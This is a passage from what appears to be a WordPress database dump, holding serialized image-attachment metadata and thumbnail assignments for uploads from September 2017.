10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(833,205,'_wp_attached_file','2017/09/HANJIN_container.jpeg'),(834,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:903;s:4:\"file\";s:29:\"2017/09/HANJIN_container.jpeg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"HANJIN_container-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"HANJIN_container-300x132.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"HANJIN_container-768x339.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:339;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"HANJIN_container-1024x452.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:452;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(835,206,'_wp_attached_file','2017/09/1280px-Postal_codes_by_country.svg_.png'),(836,206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:657;s:4:\"file\";s:47:\"2017/09/1280px-Postal_codes_by_country.svg_.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"1280px-Postal_codes_by_country.svg_-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"1280px-Postal_codes_by_country.svg_-300x154.png\";s:5:\"width\";i:300;s:6:\"height\";i:154;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:47:\"1280px-Postal_codes_by_country.svg_-768x394.png\";s:5:\"width\";i:768;s:6:\"height\";i:394;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:48:\"1280px-Postal_codes_by_country.svg_-1024x526.png\";s:5:\"width\";i:1024;s:6:\"height\";i:526;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(837,207,'_wp_attached_file','2017/09/index.jpg'),(838,207,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:279;s:6:\"height\";i:181;s:4:\"file\";s:17:\"2017/09/index.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"index-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(839,208,'_wp_attached_file','2017/09/volunteer-1326758_960_720.png'),(840,208,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:916;s:6:\"height\";i:720;s:4:\"file\";s:37:\"2017/09/volunteer-1326758_960_720.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"volunteer-1326758_960_720-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"volunteer-1326758_960_720-300x236.png\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"volunteer-1326758_960_720-768x604.png\";s:5:\"width\";i:768;s:6:\"height\";i:604;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(841,209,'_wp_attached_file','2017/09/863652975.jpg'),(842,209,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1922;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2017/09/863652975.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"863652975-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"863652975-300x94.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:94;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"863652975-768x240.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"863652975-1024x320.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(843,210,'_wp_attached_file','2017/09/river-thames-1415922_960_720.jpg'),(844,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:40:\"2017/09/river-thames-1415922_960_720.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"river-thames-1415922_960_720-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"river-thames-1415922_960_720-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"river-thames-1415922_960_720-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:15:\"Canon EOS 1200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:9:\"0.0015625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(845,211,'_wp_attached_file','2017/09/Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3.jpg'),(846,211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1800;s:6:\"height\";i:1200;s:4:\"file\";s:59:\"2017/09/Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"Citan-109-CDI-Sprinter-313-CDI-MK-London-Link-3-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"11\";s:6:\"credit\";s:15:\"Craig Eccleston\";s:6:\"camera\";s:21:\"Canon EOS 5D Mark III\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1445076304\";s:9:\"copyright\";s:54:\"Craig Eccleston 07850808665 craig@craigeccleston.co.uk\";s:12:\"focal_length\";s:2:\"28\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(847,212,'_wp_attached_file','2017/09/GoogleMaps.jpg'),(848,212,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3543;s:6:\"height\";i:2386;s:4:\"file\";s:22:\"2017/09/GoogleMaps.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"GoogleMaps-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"GoogleMaps-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"GoogleMaps-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"GoogleMaps-1024x690.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:690;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(849,213,'_wp_attached_file','2017/09/PTSD_CPTSD_ICD11.jpg'),(850,213,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:590;s:6:\"height\";i:454;s:4:\"file\";s:28:\"2017/09/PTSD_CPTSD_ICD11.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"PTSD_CPTSD_ICD11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"PTSD_CPTSD_ICD11-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(851,214,'_wp_attached_file','2017/09/file000132701536.jpg'),(852,214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:28:\"2017/09/file000132701536.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"file000132701536-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"file000132701536-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"file000132701536-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"file000132701536-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(853,215,'_wp_attached_file','2017/09/file3251255366828.jpg'),(854,215,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:933;s:4:\"file\";s:29:\"2017/09/file3251255366828.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"file3251255366828-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"file3251255366828-193x300.jpg\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(855,216,'_wp_attached_file','2017/09/file0001966720664.jpg'),(856,216,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3307;s:6:\"height\";i:2480;s:4:\"file\";s:29:\"2017/09/file0001966720664.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"file0001966720664-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"file0001966720664-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"file0001966720664-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"file0001966720664-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(857,217,'_wp_attached_file','2017/09/file5001258630705.jpg'),(858,217,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2000;s:6:\"height\";i:2000;s:4:\"file\";s:29:\"2017/09/file5001258630705.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"file5001258630705-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"file5001258630705-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"file5001258630705-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"file5001258630705-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(859,218,'_wp_attached_file','2017/09/file00053809264.jpg'),(860,218,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2918;s:6:\"height\";i:2091;s:4:\"file\";s:27:\"2017/09/file00053809264.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"file00053809264-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"file00053809264-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"file00053809264-768x550.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"file00053809264-1024x734.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:734;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(861,219,'_wp_attached_file','2017/09/file2961342149502.jpg'),(862,219,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:917;s:4:\"file\";s:29:\"2017/09/file2961342149502.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"file2961342149502-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"file2961342149502-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(863,42,'_thumbnail_id','211'),(864,70,'_thumbnail_id','196'),(865,46,'_thumbnail_id','204'),(866,47,'_thumbnail_id','204'),(867,48,'_thumbnail_id','211'),(868,56,'_thumbnail_id','212'),(869,57,'_thumbnail_id','216'),(870,58,'_thumbnail_id','204'),(871,59,'_thumbnail_id','207'),(872,62,'_thumbnail_id','198'),(873,65,'_thumbnail_id','211'),(874,66,'_thumbnail_id','212'),(875,53,'_thumbnail_id','217'),(876,41,'_thumbnail_id','200'),(877,72,'_thumbnail_id','217'),(878,67,'_thumbnail_id','216'),(879,77,'_thumbnail_id','211'),(880,79,'_thumbnail_id','204'),(881,81,'_thumbnail_id','207'),(882,82,'_thumbnail_id','215'),(883,89,'_thumbnail_id','204'),(884,90,'_thumbnail_id','198'),(885,92,'_thumbnail_id','204'),(886,105,'_thumbnail_id','217'),(887,80,'_thumbnail_id','200'),(888,84,'_thumbnail_id','211'),(889,83,'_thumbnail_id','196'),(890,103,'_thumbnail_id','196'),(891,115,'_thumbnail_id','196'),(892,54,'_thumbnail_id','204'),(893,52,'_thumbnail_id','212'),(894,106,'_thumbnail_id','211'),(895,55,'_thumbnail_id','200'),(896,118,'_thumbnail_id','204'),(897,119,'_thumbnail_id','196'),(898,43,'_thumbnail_id','204'),(899,44,'_thumbnail_id','196'),(900,45,'_thumbnail_id','216'),(901,49,'_thumbnail_id','200'),(902,50,'_thumbnail_id','208'),(903,51,'_thumbnail_id','211'),(904,87,'_thumbnail_id','204'),(905,60,'_thumbnail_id','207'),(906,61,'_thumbnail_id','199'),(907,63,'_thumbnail_id','199'),(908,68,'_thumbnail_id','204'),(909,114,'_thumbnail_id','210'),(910,69,'_thumbnail_id','200'),(911,71,'_thumbnail_id','200'),(913,73,'_thumbnail_id','210'),(914,74,'_thumbnail_id','198'),(915,75,'_thumbnail_id','210'),(916,76,'_thumbnail_id','212'),(917,78,'_thumbnail_id','210'),(918,85,'_thumbnail_id','212'),(919,86,'_thumbnail_id','210'),(920,94,'_thumbnail_id','210'),(921,91,'_thumbnail_id','196'),(922,93,'_thumbnail_id','211'),(923,95,'_thumbnail_id','212'),(924,96,'_thumbnail_id','212'),(925,97,'_thumbnail_id','210'),(926,98,'_thumbnail_id','204'),(927,99,'_thumbnail_id','204'),(928,100,'_thumbnail_id','210'),(929,102,'_thumbnail_id','199'),(930,104,'_thumbnail_id','204'),(931,107,'_thumbnail_id','198'),(932,88,'_thumbnail_id','216'),(933,108,'_thumbnail_id','211'),(934,109,'_thumbnail_id','200'),(935,110,'_thumbnail_id','215'),(936,111,'_thumbnail_id','216'),(937,112,'_thumbnail_id','216'),(938,64,'_thumbnail_id','211'),(939,116,'_thumbnail_id','215'),(940,113,'_thumbnail_id','199'),(941,101,'_thumbnail_id','204'),(942,117,'_thumbnail_id','210'),(943,121,'_thumbnail_id','208'),(944,120,'_thumbnail_id','212'),(949,222,'_wp_attached_file','2017/09/alkoghol-2714482_1280.jpg'),(950,222,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:33:\"2017/09/alkoghol-2714482_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"alkoghol-2714482_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"alkoghol-2714482_1280-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"alkoghol-2714482_1280-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"alkoghol-2714482_1280-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 650D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"42\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(951,223,'_wp_attached_file','2017/09/alkoghol-2714488_1280.jpg'),(952,223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:33:\"2017/09/alkoghol-2714488_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"alkoghol-2714488_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"alkoghol-2714488_1280-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:34:\"alkoghol-2714488_1280-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"alkoghol-2714488_1280-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"5.6\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 650D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"59\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(953,224,'_wp_attached_file','2017/09/anti-drugs-2353346_1280.png'),(954,224,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:1280;s:4:\"file\";s:35:\"2017/09/anti-drugs-2353346_1280.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"anti-drugs-2353346_1280-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"anti-drugs-2353346_1280-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"anti-drugs-2353346_1280-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"anti-drugs-2353346_1280-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s